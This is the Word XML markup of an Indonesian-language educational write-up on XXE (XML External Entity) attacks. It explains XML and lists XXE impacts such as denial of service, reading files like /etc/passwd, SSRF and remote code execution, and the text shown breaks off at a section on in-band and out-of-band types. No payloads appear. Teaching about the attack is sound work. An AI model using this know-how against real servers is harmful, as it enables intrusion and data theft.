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8DC63" w14:textId="10DD2A44" w:rsidR="001F2C49" w:rsidRPr="001F2C49" w:rsidRDefault="001F2C49" w:rsidP="001F2C49">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2C49">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>RESEARCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAB2A3A" w14:textId="0D055177" w:rsidR="001F2C49" w:rsidRPr="001F2C49" w:rsidRDefault="001F2C49" w:rsidP="001F2C49">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2C49">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[XML External Entity (XX</w:t>
      </w:r>
      <w:r w:rsidR="00321BA7">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="001F2C49">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C37B054" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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48FE55A7" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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1615EF97" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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132ECA38" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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67FB1278" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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7D4D7273" w14:textId="7B2719BC" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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0F38DC50" w14:textId="26132C26" w:rsidR="001F2C49" w:rsidRDefault="007A086D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Fonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44279D6C" wp14:editId="4891622E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>2589530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2743200" cy="2743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s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8C112" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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01001B21" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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111DEA00" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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70A6374C" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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400A8F06" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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3B6A1B05" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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1327DC6F" w14:textId="77777777" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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0B5DB038" w14:textId="21C4F969" w:rsidR="001F2C49" w:rsidRDefault="001F2C49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5C9D72F8" w14:textId="77777777" w:rsidR="002B11E3" w:rsidRDefault="002B11E3" w:rsidP="007A086D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF4EBB7" w14:textId="77777777" w:rsidR="002B11E3" w:rsidRDefault="002B11E3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1BFD39D9" w14:textId="772A024E" w:rsidR="002B11E3" w:rsidRDefault="002B11E3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21A75F3A" w14:textId="2CFCF556" w:rsidR="007A086D" w:rsidRDefault="007A086D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7F5C9FBB" w14:textId="1F68D1AE" w:rsidR="007A086D" w:rsidRDefault="007A086D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1340C6B9" w14:textId="77777777" w:rsidR="007A086D" w:rsidRDefault="007A086D" w:rsidP="001F2C49">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="176A3082" w14:textId="5342BAB5" w:rsidR="001F2C49" w:rsidRPr="002B11E3" w:rsidRDefault="001F2C49" w:rsidP="001F2C49">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A086D">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>By Ardian Danny</w:t>
      </w:r>
      <w:r w:rsidR="008A76A5" w:rsidRPr="002B11E3">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9311AA" w14:textId="77777777" w:rsidR="008A76A5" w:rsidRPr="007A086D" w:rsidRDefault="008A76A5" w:rsidP="007A086D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A086D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>XXE (XML External Entity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5D6F26" w14:textId="2DE446C9" w:rsidR="008A76A5" w:rsidRDefault="008A76A5" w:rsidP="007A086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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A086D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>What is XML?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248E5714" w14:textId="40A432AF" w:rsidR="007A086D" w:rsidRPr="00DD6AFB" w:rsidRDefault="007A086D" w:rsidP="004F681E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 w:rsidRPr="007A086D">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Pertama-tama sebelum kita membahas tentang XXE, kita harus memahami dulu tentang apa itu XML. XML atau </w:t>
      </w:r>
      <w:r w:rsidRPr="007A086D">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Extensible Markup Language </w:t>
      </w:r>
      <w:r w:rsidRPr="007A086D">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>merupakan suatu bahasa yang digunakan untuk menyimpan dan mentransport data</w:t>
      </w:r>
      <w:r w:rsidR="009A551C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. XML </w:t>
      </w:r>
      <w:r w:rsidRPr="007A086D">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">didesign agar bisa dibaca oleh manusia dan mesin. XML biasa digunakan untuk menyimpan data dalam database, bertukar informasi, </w:t>
      </w:r>
      <w:r w:rsidR="00947155">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dan </w:t>
      </w:r>
      <w:r w:rsidRPr="007A086D">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>menyimpan data di dalam HTML</w:t>
      </w:r>
      <w:r w:rsidR="00947155">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>. XML juga digunakan untuk integrasi data antara aplikasi yang berbeda-beda.</w:t>
      </w:r>
      <w:r w:rsidR="00AB4E5C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD6AFB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Dengan kata lain, XML ini merupakan bahasa yang dimengerti semua program. </w:t>
      </w:r>
      <w:r w:rsidR="00AB4E5C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Kalau boleh diberi perumpamaan, XML itu seperti bahasa Inggris. Jika kita ingin berkomunikasi dengan orang dari negara lain, kita biasanya akan menggunakan bahasa Inggris karena bahasa Inggris merupakan bahasa yan</w:t>
      </w:r>
      <w:r w:rsidR="00E71D33">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00AB4E5C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> dimengerti setiap orang pada umumnya. Nah, bagi kalian yang sudah tahu tentang JSON, berarti XML mirip dong dengan JSON.</w:t>
      </w:r>
      <w:r w:rsidR="00DD6AFB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Saya bisa bilang, ya, namun ada perbedaan. Perbedaan yang paling fundamental adalah XML merupakan </w:t>
      </w:r>
      <w:r w:rsidR="00DD6AFB" w:rsidRPr="00DD6AFB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>markup language</w:t>
      </w:r>
      <w:r w:rsidR="00DD6AFB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> dan JSON merupakan suatu cara untuk merepresentasikan sebuah objek. </w:t>
      </w:r>
      <w:r w:rsidR="00E71D33">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Mungkin akan muncul pertanyaan, HTML dan XML sama-sama merupakan markup language, apa bedanya? HTML digunakan untuk merepresentasikan data, sedangkan XML digunakan untuk transportasi data. </w:t>
      </w:r>
      <w:r w:rsidR="00B61FCD">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Penjelasan detil bisa dilihat pada source yang saya berikan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9596F5" w14:textId="112746E3" w:rsidR="00B07A07" w:rsidRDefault="00DD6AFB" w:rsidP="00B07A07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED377A4" w14:textId="17E45B96" w:rsidR="00B07A07" w:rsidRDefault="00B07A07" w:rsidP="00B07A07">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07A07">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>What is XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9A370D" w14:textId="367EC79E" w:rsidR="00B07A07" w:rsidRDefault="00B07A07" w:rsidP="004F681E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 xml:space="preserve">Setelah mengetahui apa itu XML, barulah kita coba untuk </w:t>
      </w:r>
      <w:r w:rsidR="00561FC9">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mengerti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> apa yang dimaksud dengan XXE. </w:t>
      </w:r>
      <w:r w:rsidR="00A706E7">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Secara simple kita bisa bilang bahwa XXE adalah serangan injection yang menyerang </w:t>
      </w:r>
      <w:r w:rsidR="00053499">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>aplikasi</w:t>
      </w:r>
      <w:r w:rsidR="00A706E7">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> yang mem-parsing input XML. </w:t>
      </w:r>
      <w:r w:rsidR="00496304">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Ketika XML parser tersebut tidak diconfigure dengan baik, kita bisa melakukan serangan XXE. Dengan XXE, penyerang bisa melakukan berbagai hal seperti Denial of Service</w:t>
      </w:r>
      <w:r w:rsidR="004F681E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> atau DoS, di mana penyerang bisa menghentikan service dari suatu web server sehingga menjadi tidak available (unaccessible);</w:t>
      </w:r>
      <w:r w:rsidR="00496304">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Local File Inclusion </w:t>
      </w:r>
      <w:r w:rsidR="004F681E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">atau LFI, di mana penyerang bisa memunculkan file lain yang terdapat dalam web </w:t>
      </w:r>
      <w:r w:rsidR="004F681E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>server yang seharusnya tidak bisa diakses seperti /etc/passwd;</w:t>
      </w:r>
      <w:r w:rsidR="00496304">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote File Inclusion</w:t>
      </w:r>
      <w:r w:rsidR="004F681E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> atau RFI, di mana penyerang bisa memunculkan atau mengeksekusi file dari web server lainnya ke web server</w:t>
      </w:r>
      <w:r w:rsidR="000F024E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F681E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>target;</w:t>
      </w:r>
      <w:r w:rsidR="00496304">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server Side Request Forgery </w:t>
      </w:r>
      <w:r w:rsidR="000F024E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">atau </w:t>
      </w:r>
      <w:r w:rsidR="00496304">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidR="000F024E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, di mana penyerang bisa </w:t>
      </w:r>
      <w:r w:rsidR="0049336C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mengabuse functionality pada web server</w:t>
      </w:r>
      <w:r w:rsidR="00B60912">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">; dan Remote Code Execution atau RCE di mana penyerang bisa mengeksekusi </w:t>
      </w:r>
      <w:r w:rsidR="003B2672">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>system command</w:t>
      </w:r>
      <w:r w:rsidR="00B60912">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada web server</w:t>
      </w:r>
      <w:r w:rsidR="000F024E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>. D</w:t>
      </w:r>
      <w:r w:rsidR="00496304">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>alam beberapa kasus XXE bahkan bisa membuat penyerang melakukan port scanning</w:t>
      </w:r>
      <w:r w:rsidR="00B60912">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C1C7A9" w14:textId="44069864" w:rsidR="004F681E" w:rsidRDefault="004F681E" w:rsidP="004F681E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</w:p>
    <w:p w14:paraId="468B02FE" w14:textId="7EAF91EB" w:rsidR="004F681E" w:rsidRDefault="004F681E" w:rsidP="004F681E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jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F681E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Types of XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486BCD0" w14:textId="272FA86E" w:rsidR="009435D3" w:rsidRPr="00B74FFD" w:rsidRDefault="002D59F9" w:rsidP="00B74FFD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>Menurut acunetix.com, a</w:t>
      </w:r>
      <w:r w:rsidR="00933C01">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>da dua jenis serangan XXE</w:t>
      </w:r>
      <w:r w:rsidR="00F05415">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>, ya</w:t>
      </w:r>
      <w:r w:rsidR="005D30B9">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">itu </w:t>
      </w:r>
      <w:r w:rsidR="00F05415">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>in-band dan out-of-band</w:t>
      </w:r>
      <w:r w:rsidR="0071030F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008B7060">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
